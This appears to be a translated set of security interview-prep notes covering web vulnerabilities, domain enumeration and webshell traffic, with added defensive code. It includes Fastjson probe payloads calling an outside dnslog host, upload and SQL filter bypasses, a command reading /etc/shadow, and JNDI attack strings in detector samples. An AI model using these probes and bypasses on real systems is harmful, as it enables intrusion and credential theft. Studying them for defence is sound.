HVV interview questions sorting

Table of contents

Penetration testing process
Common ports
Nmap
SQL injection
  Principle of SQL injection
  SQL injection fix recommendations
  SQL injection vulnerability mining
  SQL injection bypass methods
  sqlmap usage
File upload vulnerability
  Principle of file upload vulnerability
  File upload vulnerability repair suggestions
  File upload bypass methods
File inclusion vulnerability
  File inclusion vulnerability principle
  Four PHP functions related to file inclusion
  File inclusion exploitation
  File inclusion fix suggestions
XSS (Cross Site Scripting)
  XSS principle
  XSS fix suggestions
  !!! The difference between XSS, CSRF and SSRF vulnerabilities
CSRF (Cross Site Request Forgery)
  Principle of CSRF
  CSRF vulnerability repair recommendations
SSRF vulnerability (Server-Side Request Forgery)
  SSRF vulnerability principle
  SSRF vulnerability repair suggestions
XXE vulnerability (XML external entity injection)
  XXE vulnerability principle
  XXE vulnerability repair suggestions
  XXE hazards
  XXE trigger points
Deserialization vulnerabilities
  Deserialization vulnerability principle
  Deserialization vulnerability fix recommendations
  Shiro deserialization vulnerability
  Fastjson deserialization vulnerability
  Log4j2 lookup JNDI injection
Middleware vulnerabilities
  Parsing vulnerabilities
  Middleware Tomcat, JBoss, WebLogic with deserialization vulnerabilities
  WebLogic vulnerabilities
Intranet penetration
Privilege escalation
  Windows privilege escalation methods
  Linux privilege escalation
Intranet penetration tool
Domain information collection
  1. Obtain the domain SID
  2. Query users in the domain
  3. View detailed information of a domain user
  4. Query the domain list (if there are multiple domains)
  5. View host information in the domain
  6. Obtain the host names under a specified domain
  7. View computers in the domain
  8. View domain trust relationships
  9. Query domain password policy information
  10. View the time in the domain (time server)
  11. View the list of user groups in the domain
  12. View existing users
  13. How to find the domain controller
  14. View the domain administrators group
Traffic analysis
  Wireshark usage
  China Chopper features
  AntSword features
  Behinder (Ice Scorpion)
Traffic alarm handling for web attacks
  How to judge a SQL injection alert?
Emergency response
  The six phases of emergency response?
  How to handle an emergency involving a virus (or mining malware) or a Trojan?
  If it is Linux:
  If it is Windows:
  The difference between /etc/passwd and /etc/shadow
Intrusion troubleshooting ideas
  Linux system troubleshooting ideas
  Webshell lookup
The difference between Cookie and Session

Penetration testing process

After obtaining authorization and communicating with the customer, get the assets or target domain names provided by the customer;

Information collection: mainly use tools such as nmap, Yujian, fofa, etc. to collect ports, other IPs on the same network segment, subdomains, related services, frameworks, middleware in use, version information and historical vulnerability information. Once the information is collected, look up the relevant vulnerabilities and then verify them manually.

Vulnerability scanning: based on the collected information, use vulnerability scanners to perform automated detection such as scanning and brute-forcing, and verify vulnerabilities according to the scan results.

Manual vulnerability mining: manual vulnerability verification and manual vulnerability discovery.

Manually verify the collected framework vulnerabilities and component vulnerabilities;

Then use tools such as Burp Suite to look for vulnerabilities at the main function points, such as the login page, file upload page, information query page, password reset page, etc.

Privilege escalation: with the customer's permission, escalate privileges further or perform intranet penetration from the vulnerability point where shell access was obtained.

Trace removal: clean up Trojans, accounts, etc. left behind during the penetration.

Report writing: write a vulnerability report based on the vulnerabilities found, with suggestions for fixing them.

Vulnerability retest: after the customer has completed the fixes, retest to check whether the vulnerabilities have really been fixed and close the loop.

Common ports

21 FTP

22 SSH

80 HTTP

443 HTTPS

445 SMB (MS17-010 exploit port)

3389 Remote Desktop (RDP)

3306 MySQL database

1433 SQL Server database

1521 Oracle database

7001 WebLogic middleware management interface

8080 Tomcat middleware management interface

6379 Redis database

Nmap

nmap hostname/IP, multiple IPs, or a subnet such as 192.168.123.*

-iL ip.txt scan all IPs listed in ip.txt

-A aggressive scan: includes -sV and -O, OS detection and traceroute. Generally not used, as it is an intense scan

-O detect operating system information

-sV detect service version numbers

-sA ACK scan, detects whether the host uses a packet filter or firewall

-sS half-open (SYN) scan; generally not recorded in the target's logs, but root privilege is required

-sT TCP connect() scan; this method leaves a large number of connection requests and error messages in the target host's logs

-sP ping scan; with this flag nmap only continues to scan hosts that answer ping. Generally best not to use it, because some hosts block ping but do exist

-sN TCP null scan

-F fast scan (fewer ports)

-Pn skip the ping before scanning; useful when the firewall blocks ping

-p specify a port or port range

-oN write the report to a file

-v verbose output

-T<0-5> set the timing (speed) template

SQL injection

Principle of SQL injection

The input from the client is not validated, so it becomes part of the SQL statement passed to the database and is executed there, resulting in the vulnerability.

SQL Injection Fix Recommendations

Adding a WAF can effectively mitigate it and serves as a temporary measure. To fix it at the root, the source code must be modified: generally, strictly filter the parameters used in SQL statements, or use prepared statements (the query to be executed is compiled first, and the parameters supplied later are treated purely as string data).

SQL injection vulnerability mining

SQL injection vulnerabilities generally appear where there is data interaction, such as login pages, data query pages, news pages, data entry pages, etc.

SQL injection bypass method

  1. Use mixed case;
  2. Inline comment bypass, i.e. /*!12345 statement */;
  3. Use equivalent replacements, such as replacing the equal sign with like;
  4. Use hexadecimal encoding to represent strings, bypassing filtering of database names.

sqlmap use

-U USER DBMS user to enumerate

-r Use a file as the request to submit during injection (can be used with a request captured by Burp Suite)

--dbms specify the database type or version

--dbs enumerate the DBMS databases

--tables enumerate the tables in a database

--columns enumerate the column names in a table

-D DB name of the database to enumerate

-T TBL name of the table to enumerate

-C COL name of the column to enumerate

--os-shell obtain an OS shell (writes a webshell)

--dump dump the database contents

--tamper use tamper scripts to bypass filtering

Common tamper scripts

 base64encode.py base64-encodes the payload

 charencode.py URL-encodes the payload

 chardoubleencode.py double URL-encodes the payload

 unmagicquotes.py wide-byte injection

 randomcomments.py splits SQL keywords with /**/

File Upload Vulnerability

Principle of file upload vulnerability

Because validation of uploaded files is incomplete, an executable file can be uploaded to the server, resulting in the vulnerability.

File Upload Vulnerability Repair Suggestions

On the server side, filter file extensions with blacklists and whitelists, verify the file content, rename files after upload, or store uploaded files on a separate service.

File upload bypass method

1. Blacklist

 a. Special suffixes such as .php5, .phtml, .asa, .jap, etc.

 b. Upload .htaccess

 c. Case variation, e.g. pHp

 d. Add a space before the file extension in the request

 e. Add a dot after the suffix

 f. Add ::$DATA after the suffix

 g. If the filter is not applied recursively, use something like x.php..

2. Whitelist (generally needs to be combined with other vulnerabilities)

 a. %00 truncation

 b. Image webshell (picture horse)

 c. Race condition
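An added example of the server-side validation suggested above, written for these notes and not code from the original page: an allowlist check on the extension, a magic-byte check on the content, and a server-chosen file name. The function is written so that the bypass cases listed above (case variation, a trailing dot, ::$DATA, %00, x.php.., .htaccess, an image with a script inside) are all rejected; the allowed types, magic bytes and script markers are assumptions chosen for the example.

```python
import os

# Allowlisted extensions and the magic bytes a file of that type must start with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


def validate_upload(filename: str, content: bytes):
    """Return (accepted, detail). detail is the extension when accepted,
    otherwise the reason for rejection."""
    # Drop any client-supplied directory part (both separator styles).
    name = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in name or "%00" in name:
        return False, "null byte in file name"
    if "::" in name:                      # NTFS alternate data stream, e.g. x.php::$DATA
        return False, "alternate data stream suffix"
    if name != name.rstrip(". "):         # Windows strips trailing dots/spaces: x.php. -> x.php
        return False, "trailing dot or space"
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:   # rejects x.php.jpg, x.jpg.php and .htaccess
        return False, "file name must be exactly name.ext"
    ext = parts[1]                        # lower-cased, so pHp / PHP5 cannot slip past
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not in allowlist"
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match declared type"
    if any(marker in content for marker in SCRIPT_MARKERS):   # image with embedded script
        return False, "script marker inside file content"
    return True, ext


def stored_name(ext: str, random_id: str) -> str:
    """Server-chosen name for the saved file; random_id is generated by the
    server (e.g. secrets.token_hex), never derived from the client's name."""
    return f"{random_id}.{ext}"
```

The allowlist is deliberately strict (exactly one dot, no double extensions); storing the file under a random server-chosen name outside the web root, as the notes suggest, removes the remaining dependence on the client's file name entirely.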

File inclusion vulnerability

File inclusion vulnerability principle

Principle: file inclusion itself is a normal function. If the client can influence the included file name so that a malicious file is included, a vulnerability results.

Four PHP functions related to file inclusion

1. include(): the file is included only when execution reaches this call; on error it only issues a warning and continues executing.

2. include_once(): same as include(), except that if the same file is included repeatedly it is only included once.

3. require(): the file is included as soon as the program runs; on error it outputs an error message and terminates the program immediately.

4. require_once(): same as require(), except that if the same file is included repeatedly it is only included once.

File inclusion exploitation

 1. Read sensitive files via the file:// pseudo-protocol

 2. Remote inclusion of a shell

 3. Upload an image and include the image shell

 4. Use the php://input pseudo-protocol to read the POST data and execute it as PHP code

 5. Include the log file to get a shell

 6. Truncation-based inclusion bypass

File inclusion fix suggestions

Fix:

  1. Set the PHP parameters allow_url_include=Off and allow_url_fopen=Off
  2. Strictly validate the path to be included

XSS (Cross Site Scripting)

XSS principle

Principle: the Chinese name is cross-site scripting attack; malicious scripts (usually JS code) are inserted into a page to attack the user's browser.

The biggest feature of XSS is that malicious HTML/JavaScript can be injected into the web pages the user browses. It arises because the web application does not strictly filter user input. Since HTML and client-side JavaScript can run freely in the browser on the victim's host, this amounts to complete control over the logic of the web client, on which basis an attacker can easily carry out cookie theft, session hijacking, phishing and other attacks.

XSS fix suggestion

  1. Filter the input, for example filtering out the characters < and >
  2. HTML-encode content before it is output
  3. Set the HttpOnly flag on important cookies to prevent client-side scripts from reading them via document.cookie

!!! The difference between XSS, CSRF and SSRF vulnerabilities

XSS is cross-site scripting; the target is the client. Because it is a script attack, the client does whatever the JS script says, such as stealing cookies, so it is more flexible.

CSRF is cross-site request forgery; the target is also the client. When exploited it can only make use of the user's cookies, and only at function points that have CSRF vulnerabilities, so it is more limited than XSS.

SSRF is server-side request forgery; it attacks the server and is more harmful. It can lead to intranet penetration, command execution and intranet information leakage.

CSRF (Cross Site Request Forgery)

Principle of CSRF

Principle: the Chinese name is cross-site request forgery. While the user remains logged in, the attacker constructs a site and lures the user into visiting it; after the visit, the malicious site makes the user's browser jump to a page that has a CSRF vulnerability. If that page is, for example, a password-change page, the cookie that keeps the login state is stolen (ridden on) in the process, and the password gets changed.

CSRF Vulnerability Repair Recommendations

  1. At important function points, add verification of the request source, such as checking the Referer header
  2. Add CAPTCHA verification and token verification
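The two repair recommendations above (source verification and a token) as an added example written for these notes, not code from the original page: the token is an HMAC over the session id under a server secret, and a state-changing request is accepted only if its Origin (or Referer) matches the site and the token matches. The secret, the origin and the session id are hypothetical values.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Hypothetical values: a server-side secret and the site's own origin.
SECRET_KEY = b"replace-with-a-long-random-server-secret"
ALLOWED_ORIGINS = {"https://app.example"}


def make_csrf_token(session_id: str) -> str:
    """Token tied to the session via HMAC; an attacker's site cannot compute it."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def source_is_allowed(headers: dict) -> bool:
    """Recommendation 1: verify the request source. Prefer Origin, fall back to
    Referer; a state-changing request with neither is treated as cross-site."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    u = urlparse(src)
    return f"{u.scheme}://{u.netloc}" in ALLOWED_ORIGINS


def verify_state_change(headers: dict, form: dict, session_id: str) -> bool:
    """Accept a password-change (or similar) POST only if the source check and
    the token check (recommendation 2) both pass."""
    if not source_is_allowed(headers):
        return False
    supplied = form.get("csrf_token", "")
    return hmac.compare_digest(supplied, make_csrf_token(session_id))
```

Because the token is derived from the session, a page on the attacker's site can neither read it (same-origin policy) nor compute it (no secret), so the forged request fails even though the browser attaches the victim's cookie.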

SSRF vulnerability (Server-Side Request Forgery)

SSRF Vulnerability Principle

Principle: the server fetches a resource from a user-supplied address. If that address is not validated, the vulnerability lets an outsider probe, access, or even attack intranet resources and services that should not be reachable.

SSRF Vulnerability Repair Suggestions

repair:

1. Allowlist the addresses that may be requested

2. Resolve the domain name to an IP and filter out internal IPs

3. Verify the returned content and compare it with what is expected
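Repair suggestions 1 and 2 above as an added example written for these notes (not code from the original page): the URL's scheme and host are checked against an allowlist, then the name is resolved and every address it maps to is tested against the internal ranges. The allowlisted host and the resolver table are assumptions; the live resolver is shown but the tests use an offline table.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Assumed policy: only these hosts and schemes may be fetched by the server.
ALLOWED_HOSTS = {"img.example"}
ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host: str) -> set:
    """Live resolver: every address the name maps to (A and AAAA records)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def resolver_from_table(table: dict):
    """Offline resolver built from a constructed name -> addresses table."""
    return lambda host: set(table[host])


def is_internal(ip) -> bool:
    """Loopback, RFC 1918, link-local (incl. cloud metadata), reserved, multicast, unspecified."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def is_safe_target(url: str, resolver=resolve_all):
    """Suggestions 1 and 2: allowlist the address, then resolve the name and
    refuse anything that maps to an internal IP. Returns (ok, reason)."""
    u = urlparse(url)
    if u.scheme not in ALLOWED_SCHEMES:        # also blocks file://, gopher://, dict://
        return False, "scheme not allowed"
    host = u.hostname
    if not host:
        return False, "no host in URL"
    if host not in ALLOWED_HOSTS:
        return False, "host not in allowlist"
    try:
        addrs = resolver(host)
    except (OSError, KeyError):
        return False, "name resolution failed"
    if not addrs:
        return False, "name resolution returned nothing"
    for a in addrs:                             # an allowlisted name may still point inside
        ip = ipaddress.ip_address(a)
        if is_internal(ip):
            return False, f"resolves to internal address {ip}"
    return True, "ok"
```

Resolving separately from fetching leaves a window in which the DNS answer can change (rebinding); the fetch should therefore connect to the address that was checked rather than re-resolve the name, and suggestion 3 (checking the returned content) remains a second layer.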

 

 

XXE vulnerability (XML external entity injection)

XXE vulnerability principle

Principle: also known as XML external entity injection; due to lax filtering, the vulnerability arises when a malicious XML document supplied by the user is parsed.

XXE vulnerability repair suggestions

Repair suggestions:

  1. Filter the XML data submitted by users;
  2. Set the PHP parameter that disables loading of external entities;

XXE hazards

When external entity references are allowed, constructed malicious content can lead to reading arbitrary files, executing system commands, probing intranet ports and attacking intranet websites.

XXE trigger points

XXE is often triggered where XML files can be uploaded and the uploaded XML is not filtered, so that a malicious XML file can be submitted.
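An added example for the repair suggestions and the trigger point above, written for these notes and not code from the original page: a parser wrapper that refuses any document carrying a DTD (which every external-entity reference needs) and a detection rule for upload points that flags SYSTEM/PUBLIC entity declarations. The sample documents are constructed; the file path in the probe is a placeholder.

```python
import re
import xml.etree.ElementTree as ET

# Any DTD at all is rejected: external entities, parameter entities and
# entity-expansion bombs all need a <!DOCTYPE ...> to be declared.
DTD_RE = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(rb"<!ENTITY[^>]*\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)


def parse_untrusted_xml(data: bytes):
    """Parse user-supplied XML only if it carries no DTD (defensive default)."""
    if DTD_RE.search(data):
        raise ValueError("DTD / entity declarations are not accepted")
    return ET.fromstring(data)


def is_accepted(data: bytes) -> bool:
    """True if the document passes the DTD check and parses."""
    try:
        parse_untrusted_xml(data)
        return True
    except (ValueError, ET.ParseError):
        return False


def has_external_entity(data: bytes) -> bool:
    """Detection rule for upload points / WAF logs: flags SYSTEM or PUBLIC entities."""
    return EXTERNAL_ENTITY_RE.search(data) is not None


# Constructed samples: a benign order document, an XXE-style probe with a
# placeholder path, and a document with an internal-only entity.
BENIGN_DOC = b"<order><id>7</id><item>widget</item></order>"
XXE_DOC = (b'<?xml version="1.0"?>'
           b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "file:///placeholder/secret.txt">]>'
           b"<order><id>&xxe;</id></order>")
INTERNAL_DTD_DOC = (b'<!DOCTYPE order [<!ENTITY co "Example Co">]>'
                    b"<order><id>&co;</id></order>")
```

Rejecting every DTD is stricter than the notes' "disable external entities", but it is the simplest rule to get right for an upload endpoint that never legitimately needs one; has_external_entity is the narrower check for alerting only on the dangerous case.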

Deserialization Vulnerabilities

Deserialization Vulnerability Principle

Principle: serialization is the process of converting a Java object into a byte stream (file), and deserialization converts that stream back into a Java object. This is a normal process in itself, but if the serialized data is malicious, the resulting object can also be malicious, which can lead to threats such as command execution.

Deserialization Vulnerability Fix Recommendations

The deserialization vulnerabilities we encounter are basically caused by using components or classes that have deserialization vulnerabilities. Generally, they can be defended against by patching or upgrading to the latest version.

Shiro deserialization vulnerability

This vulnerability exists in Shiro versions < 1.2.4. When probing, delete the rememberMe parameter from the request; if the response contains the field rememberMe=deleteMe, the Shiro component is in use and this vulnerability can be tried.

If the response does not have this field, add the field rememberMe= to the Cookie of the request and then check whether the keyword appears in the response.

There are two variants of this vulnerability:

SHIRO-550:

No key needs to be provided; the default key can be used.

SHIRO-721 deserialization vulnerability:

Brute-force the key first, then exploit further after success.

Fastjson deserialization vulnerability

Fastjson provides a deserialization feature that lets the input JSON specify an arbitrary class to deserialize through the value of the "@type" key, which leads to deserialization vulnerabilities.

Vulnerability mining method: if the HTTP header Accept: application/json appears in the request, a fastjson component is suspected. Send a deliberately malformed input so that an error is returned; if "fastjson" appears in the response, the component is confirmed and this vulnerability can be tried.

This vulnerability exists in multiple Fastjson versions from 1.2.24 to 1.2.67. If there is no echo, substitute the following payloads into the request content one by one to find which version is vulnerable:

{"@type":"java.net.InetSocketAddress"{"address":,"val":"aaa.dnslog.cn"}}

{"@type":"java.net.Inet4Address","val":"aaa.dnslog.cn"}

{"@type":"java.net.Inet6Address","val":"aaa.dnslog.cn"}

{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL", "val":"http://aaa.dnslog.cn"}}""}

Set[{"@type":"java.net.URL","val":"http://aaa.dnslog.cn"}]

Set[{"@type":"java.net.URL","val":"http://aaa.dnslog.cn"}

{ {"@type":"java.net.URL","val":"http://aaa.dnslog.cn"}:0

Log4j2 lookup function JNDI injection

Principle: it lies in Apache Log4j's logging function itself, which has a lookup (string substitution) feature. When it encounters ${jndi:...} in a logged message, it resolves and executes the lookup. JNDI can in turn load class files via LDAP or RMI, so putting the code to be executed into that class file results in code injection.

Traffic characteristics: ${jndi:ldap://...} and ${jndi:rmi://...}

For defense, upgrade the version and disable the lookup feature through its configuration option.
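The traffic characteristic above turned into detection logic, as an added example written for these notes (not code from the original page). It goes slightly beyond the two literal signatures: nested wrapper lookups such as ${${lower:j}ndi:...} and ${::-j}, which are used to hide the keyword, are collapsed before matching. The log lines are constructed and attacker.example is a placeholder host.

```python
import re

# Wrappers commonly used to hide the keyword: ${lower:x}, ${upper:x}, ${::-x}
WRAPPER_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{::-([^${}]*)\}", re.IGNORECASE)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\b", re.IGNORECASE)


def normalize(s: str) -> str:
    """Collapse nested wrapper lookups until the string stops changing, e.g.
    ${${lower:j}ndi:ldap://...} -> ${jndi:ldap://...}."""
    prev = None
    while prev != s:
        prev = s
        s = WRAPPER_RE.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s


def find_jndi_lookups(log_lines):
    """Return (line_number, protocol) for every line carrying a JNDI lookup string."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = JNDI_RE.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# Constructed access-log lines; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://attacker.example/b}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldaps://attacker.example/c}"',
    '10.0.0.7 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "-"',
]
```

Run over the sample, the function flags lines 2, 3 and 4 and leaves the harmless ${date:...} lookup on line 5 alone; the same normalization step is what makes a WAF or log rule resistant to the simplest obfuscations.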

Middleware vulnerabilities

Parsing vulnerabilities

Apache filename parsing

Apache parses extensions from right to left. For the file a.php.abc it looks at abc first; if Apache does not recognise it, it moves left and finds php, so the file is finally handled as PHP.

IIS parsing vulnerabilities

1. Directory parsing: IIS parses from left to right. When handling a.asp/a.jpg, it first finds the asp suffix, assumes the file is asp, and parses it as asp.

2. File name parsing: IIS parses from left to right. When handling a.asp;.jpg, it first finds the asp suffix, assumes the file is asp, and parses it as asp.

Nginx malformed file name parsing

For the file a.jpg, request a.jpg/.php. When looking up the file content, .php is not a complete file name, so nginx walks back and finds a.jpg. When determining the file type, nginx looks at the suffix; .php is a complete suffix, so the request is handed to PHP, and a.jpg ends up being executed as PHP.

Middleware Tomcat, JBoss, WebLogic with deserialization vulnerabilities

WebLogic vulnerabilities

WebLogic is usually found on port 7001.

Unauthorized access, deserialization, SSRF, T3 protocol deserialization, etc.

Intranet penetration

Privilege escalation

Windows privilege escalation methods

1. Kernel privilege escalation: run WinSystemHelper, which suggests suitable kernel vulnerability numbers, and try them

2. Database privilege escalation: MySQL UDF privilege escalation, SQL Server xp_cmdshell privilege escalation

3. Application privilege escalation

4. Man-in-the-middle hijacking, etc.

Linux privilege escalation

  1. Kernel vulnerability escalation
  2. SUID escalation: a file with the SUID bit set runs as its owner; if the owner is root, it executes as root
  3. sudo escalation: sudo lets a permitted user execute commands with root privileges; if it is misconfigured, it leads to privilege escalation
  4. Scheduled task escalation: a crontab job is executed as root by default
  5. curl escalation: sudo curl file:///etc/shadow reads the shadow file, which stores the password hashes of all users, from which high-privilege users' passwords can be obtained

Intranet penetration tool

Mimikatz is mainly used for domain penetration.

Domain information collection

Collection of basic information in the domain

Golden ticket: a forged TGT, equivalent to obtaining domain control privileges

Silver ticket: a forged ST (service ticket), used to log in to a specific service

1. Obtain the domain SID

whoami /all

The domain SID is used to distinguish different domains, and the domain user SID distinguishes different users within the domain; both are used later when passing tickets.

2. Query users in the domain

net user /domain

Querying the users in the domain reveals all user names in the current domain.

3. View detailed information of a domain user

net user tom /domain

Viewing the details of a domain user gives information such as the password expiry time, group membership and last logon time.

4. Query the domain list (if there are multiple domains)

net view /domain

Querying the domain list shows that there are currently two domains: C1AY and SUB.

5. View host information in the domain

net view

Querying the host information in the domain shows that there are 3 computers in the current domain.

6. Obtain the host names under a specified domain

net view /domain:C1ay

Querying the host names under the specified domain likewise shows 3 hosts in the current domain.

7. View computers in the domain

net group "domain computers" /domain

Viewing the computers in the domain shows that a total of 2 computers have joined the current domain.

8. View domain trust relationships

nltest /domain_trusts

Checking the domain trust relationships tells us whether the current domain has forest trusts or parent-child domain trusts, which is needed for later cross-domain or cross-forest attacks.

9. Query domain password policy information

net accounts /domain

Querying the domain password information tells us how often domain users must change their passwords and what the password policy is, so that a targeted password dictionary can be built to improve efficiency.

10. View the time in the domain (time server)

net time /domain

Checking the time in the domain (time server) gives the current domain time; some .bat files can then be run via scheduled tasks plus an IPC remote connection, which is described in detail later.

11. View the list of user groups in the domain

net group /domain

Domain Admins: domain administrators.

Domain Computers: domain computers.

Domain Controllers: domain controllers.

Domain Guests: domain guests with low privileges.

Domain Users: domain users.

Enterprise Admins: enterprise administrator users.

By default, Domain Admins and Enterprise Admins have full control over all domain controllers in the domain.

Looking at the domain's user groups tells us what each group does. For example, some large enterprises or groups have dedicated finance, IT and marketing groups; so if we want to target a particular department, group or person during penetration, collecting group information is especially critical.

12. View existing users

dsquery user

(A screenshot listing commonly used dsquery commands is not reproduced here.)

13. How to find the domain controller

1. Find the domain controller with the nltest command

nltest /dclist:hacker

We can see that there are two domain controllers in the current domain: one primary and one secondary.

2. By querying the time in the domain

net time /domain

Because the time server is generally a domain controller, the domain controller's IP address can also be obtained by pinging it.

3. View the Domain Controllers group

net group "Domain Controllers" /domain

4. Query the primary domain controller

netdom query pdc

5. nslookup query

nslookup DC1.c1ay.lab

14. View the domain administrators group

net localgroup administrators /domain

Traffic Analysis

Wireshark usage

Simple Wireshark filter rules

Filter by IP:

Source IP address: ip.src==1.1.1.1; destination IP address: ip.dst==1.1.1.1

Filter by port:

Port 80: tcp.port==80; source port: tcp.srcport==80; destination port: tcp.dstport==80

Protocol filtering:

Just enter the protocol name directly, e.g. http for the HTTP protocol

HTTP method filtering:

GET/POST requests: http.request.method=="GET" or http.request.method=="POST"

Traffic characteristics of China Chopper, AntSword and Behinder

China Chopper features

The commands sent to the Chopper webshell are base64-encoded; there are two key payload parameters, z1 and z2 (the names can vary), and the request contains the function eval.

AntSword features

The default User-Agent header is antSword xxx, but it can be changed through the request UA setting in the /modules/request.js file.

The most obvious traffic feature is @ini_set("display_errors","0"); this line is present in basically every request that a webshell client sends to a PHP webshell.

After obfuscation and encryption, AntSword has another obvious feature: most parameter names take the form "_0x......=" (the underscore can be replaced), so parameter names starting with _0x are likely to be malicious traffic.

Behinder (Ice Scorpion)

Inspecting the packets shows no obvious payload characteristics, but it can be seen that it is a POST request.

1. An Accept header containing application/xhtml+xml, application/xml, application/signed-exchange is a weak feature (and the browser version in the UA header is very old).

2. Content-Type: application/octet-stream is a strong feature. octet-stream means that only binary data is submitted, and only one binary body; if a file is submitted there can be only one file, and the backend has only one receiving parameter, which can only be a stream (or byte array). It is rarely used by normal applications.

Behinder 2 features:

The default Accept value is very distinctive and is the same at every stage. Behinder has more than ten built-in User-Agents and picks one at random for each shell connection; they are relatively old and therefore easy to detect, but the UA header can be modified in Burp.

Content-Length: 16 is the characteristic of the Behinder 2 connection request.

Behinder 3 features:

Behinder 3 removed the dynamic key acquisition, because many WAFs and other devices had already analysed the traffic characteristics of Behinder 2. For the PHP shell, packet capture shows no obvious characteristics other than it being a POST request.

1) The Accept header application/xhtml+xml, application/xml, application/signed-exchange is a weak feature.

2) The UA header is a weak feature: it can be modified through Burp, and the 16 built-in User-Agents of Behinder 3.0 are relatively old and rarely used in practice, so this can also be used as a WAF rule.

For the JSP shell, packet capture shows Content-Type: application/octet-stream, which is a strong feature; octet-stream means that only binary data is submitted, and only one binary body; if a file is submitted there can be only one file, and the backend has only one receiving parameter, which can only be a stream (or byte array). It is rarely used.
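The three sets of traffic features above written as detection logic, an added example for these notes and not code from the original page or from any of the tools: each request is a plain dict of method, headers, parameters and body, and the classifier reports which client's documented features it matches, scoring Behinder by strong versus weak indicators. The four sample requests are constructed, not captured traffic.

```python
import base64
import re


def looks_base64(value: str) -> bool:
    """True for a string that decodes cleanly as base64 (URL-encoded '=' allowed)."""
    if len(value) < 16 or not re.fullmatch(r"[A-Za-z0-9+/=%]+", value):
        return False
    try:
        base64.b64decode(value.replace("%3D", "="), validate=True)
        return True
    except ValueError:          # binascii.Error is a ValueError subclass
        return False


def classify_request(req: dict) -> list:
    """Return the webshell clients whose documented traffic features the request matches.
    req = {"method", "headers": {...}, "params": {name: value}, "body": str}."""
    hdr = {k.lower(): v for k, v in req.get("headers", {}).items()}
    params = req.get("params", {})
    body = req.get("body", "")
    ua = hdr.get("user-agent", "")
    found = []

    # China Chopper: eval in the request plus base64-encoded payload parameters (z0/z1/z2 style)
    if "eval(" in body and any(looks_base64(v) for v in params.values()):
        found.append("chopper")

    # AntSword: default UA, the @ini_set line, or _0x-prefixed parameter names
    if (ua.lower().startswith("antsword")
            or '@ini_set("display_errors","0")' in body
            or any(k.startswith("_0x") for k in params)):
        found.append("antsword")

    # Behinder: POST + application/octet-stream is the strong feature; the Accept
    # value and a 16-byte body (Behinder 2) are weak features that raise the score.
    if req.get("method") == "POST" and hdr.get("content-type", "").startswith("application/octet-stream"):
        score = 1
        if "application/signed-exchange" in hdr.get("accept", ""):
            score += 1
        if hdr.get("content-length") == "16":
            score += 1
        found.append(f"behinder(score={score})")
    return found


# Constructed sample requests (not captured traffic).
CHOPPER_PARAM = base64.b64encode(b"constructed chopper payload").decode()
SAMPLES = {
    "chopper": {"method": "POST",
                "headers": {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0)",
                            "Content-Type": "application/x-www-form-urlencoded"},
                "params": {"pass": "@eval(base64_decode($_POST[z0]));", "z0": CHOPPER_PARAM},
                "body": "pass=@eval(base64_decode($_POST[z0]));&z0=" + CHOPPER_PARAM},
    "antsword": {"method": "POST",
                 "headers": {"User-Agent": "antSword/v2.1",
                             "Content-Type": "application/x-www-form-urlencoded"},
                 "params": {"_0x3f2a1b": "x"},
                 "body": '_0x3f2a1b=@ini_set("display_errors","0");'},
    "behinder": {"method": "POST",
                 "headers": {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) Firefox/40.0",
                             "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,"
                                       "application/signed-exchange;v=b3;q=0.9",
                             "Content-Type": "application/octet-stream",
                             "Content-Length": "16"},
                 "params": {}, "body": "x" * 16},
    "benign": {"method": "GET", "headers": {"User-Agent": "Mozilla/5.0"},
               "params": {"q": "hello"}, "body": ""},
}
```

The Behinder score makes the point of the notes explicit: a lone octet-stream POST is worth an alert, while the old User-Agent and the Accept value only corroborate it, since both can be changed in Burp.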

Traffic alarm handling for web attacks

The general approach to judging and handling alerts for different vulnerabilities and degrees of harm is as follows:

First check whether it is really an attack; if so, block the IP and port first to stop the attack from continuing.

Then check whether it succeeded. If it did, determine the impact and restore the system.

If the alert indicates an existing compromise, such as webshell communication (there must have been a webshell upload before it), or the source address is an intranet host (that host may itself have been compromised), trace the source.

How to judge a SQL injection alert?

